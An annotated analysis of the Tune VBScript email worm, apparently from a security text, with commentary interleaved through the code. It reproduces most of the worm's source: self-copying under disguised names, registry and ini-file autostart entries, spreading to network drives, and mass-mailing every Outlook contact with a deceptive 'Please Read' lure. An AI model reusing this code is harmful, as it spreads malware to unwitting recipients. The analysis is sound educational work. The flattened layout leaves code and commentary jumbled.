Tune.Vbs the Tune Worm Is Written in Vbscript

Home , Outlook Express

Tune.vbs The tune worm is written in VBScript. It first infects several local folders and sets itself to be run at boot. Tune then copies itself to all network and hard drives before harvesting email addresses from Outlook and propagating via email. Finally, it modifies select IRC clients to send the worm to any person who joins the infected user's IRC channel.

Main script sub. The actual call to this sub is much further down in the code. sub Tune() On Error Resume Next Keep going if an error occurs. All Tune subs and functions begin with this.

Dim obj, sysfldr,s, f Local Preservation Set obj = CreateObject("Scripting.FileSystemObject") Set sysfldr = obj.GetSpecialFolder(1) Copy self to local Windows, Set winfldr = obj.GetSpecialFolder(0) System, and temp folders. Set tmpfldr = obj.GetSpecialFolder(2) set s = CreateObject("Scripting.FileSystemObject") Set f = s.GetFile(WScript.ScriptFullName) Re-infection f.copy(sysfldr&"\tune.vbs") Set worm to automatically reinfect local f.copy(winfldr&"\tune.vbs") machine. Unless all copies of Tune are f.copy(tmpfldr&"\tune.vbs") f.copy(sysfldr&"\kernel.vbs") removed, machine will become f.copy(winfldr&"\winsck.vbs") completely reinfected next reboot. f.copy(sysfldr&"\explorer.vbs") loc=winfldr&"\tune.vbs" loc1=sysfldr&"\tune.vbs" loc2=tmpfldr&"\tune.vbs" loc3=sysfldr&"\kernel.vbs" loc4=winfldr&"\winsck.vbs" loc5="explorer.vbs" Set WSHShell = CreateObject("WScript.Shell") WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry", loc WSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\", loc1 WSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\", loc2 editini winfldr&"\win.ini","[windows]","load",loc3 editini winfldr&"\win.ini","[windows]","run",loc4 editini winfldr&"\system.ini","[boot]","shell","Explorer.exe " & loc5 ntwrk() end sub

Start local network propagation Function ShowDriveType(drvpath) On Error Resume Next sub ntwrk() Dim fso, d, t On Error Resume Next Set fso = for n = 65 to 90 Find Connected Drives CreateObject("Scripting.FileSystemObject") l=Chr(n) Set d = fso.GetDrive(drvpath) drv=l&":" Search possible drives A through Select Case d.DriveType d3=ShowDriveType(drv) Z. If a drive is fixed or a network Case 0: t = "Unknown" if d3 = "Fixed" then infect(drv) drive, then infect that drive. Case 1: t = "Removable" if d3 = "Network" then infect(drv) Case 2: t = "Fixed" next Case 3: t = "Network" sprd() Case 4: t = "CD-ROM" end sub Case 5: t = "RAM Disk" End Select if t = "" then t = "None" ShowDriveType = t End Function

sub infect(drive) On Error Resume Next set s = CreateObject("Scripting.FileSystemObject") Start email propagation Set f = s.GetFile(WScript.ScriptFullName) f.copy(drive & "\tune.vbs") path=drive&"\tune.vbs" Infect Drive end sub Infect a given drive by placing a copy of Tune into the root directory. Email Propagation Previously Infected? sub sprd() Check registry to see if emails on error resume next have been sent before. If not, then Dim oShell proceed. Otherwise, skip to IRC Set oShell = Wscript.CreateObject("Wscript.Shell") propagation. Dim strProfile Dim strAlias, strAliasKey strProfile = oShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Sent?") if strProfile = "" then oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Sent?", "1" Set Prg = CreateObject("Outlook.Application") Set Prg1 = Prg.GetNameSpace("MAPI") Access Outlook/Outlook Express For y = 1 To Prg1.AddressLists.Count Set AdBook = Prg1.AddressLists(y) x = 1 Send Tune via Email Set Maie = Prg.CreateItem(0) For oo = 1 To AdBook.AddressEntries.Count Loop through all Outlook newmailadd = AdBook.AddressEntries(x) contacts, sending each of them an Maie.Recipients.Add newmailadd email with Tune attached. x = x + 1 Next Maie.Subject = "Please Read" Email Message Maie.Body = "Hey, you really need to check out this attached file I sent you...please check it out as soon as possible." Subject uninformative while Maie.Attachments.Add WScript.ScriptFullName message is ambiguous regarding Maie.DeleteAfterSubmit = False attachment. Maie.Send newmailadd="" next else end if etc() end sub

Begin IRC Propagation Function ReportFolderStatus(fldr) On Error Resume Next Dim fso, msg sub etc() Check for IRC Clients On Error Resume Next Set fso = a=ReportFolderStatus("C:\mirc") If mIRC of PIRCH is present, CreateObject("Scripting.FileSystemObject") if a="1" then mirc() then infect the client. If (fso.FolderExists(fldr)) Then b=ReportFolderStatus("C:\pirch98") msg = "1" if b="1" then pirch9x() Else end sub msg = "0" End If ReportFolderStatus = msg End Function Verify Folder Existence Tune() Main sub Call Let the mischief begin. Check to see if a given folder exists.

Function ReportFileStatus(filespec) sub pirch9x() sub mirc() On Error Resume Next ...... Dim fso, msg (code removed for brevity) (code removed for brevity) Set fso = ...... CreateObject("Scripting.FileSystemObject") end sub end sub If (fso.FileExists(filespec)) Then msg = "1" Else Modify IRC Client Setup to Automatically Propagate Tune msg = "0" End If The initialization files for mIRC or PIRCH (if available) are ReportFileStatus = msg modified so that the client automatically sends Tune.vbs via DCC End Function Verify File Existence to anyone who joins the infected user's channel. Direct Client-to- Check to see if a given file exists. Client (DCC) is a protocol allowing IRC users to communicate and Interestingly, this function is share files independent of the IRC server. never used in Tune.

sub editini(filename,section,string,newvalue) ... Edit Initialization File ' (code removed for brevity) Modify a file, placing a given value for 'Tune Virus By Slug Author's Signature ... end sub the string in the specified section. Used in Tune() and mirc() subs.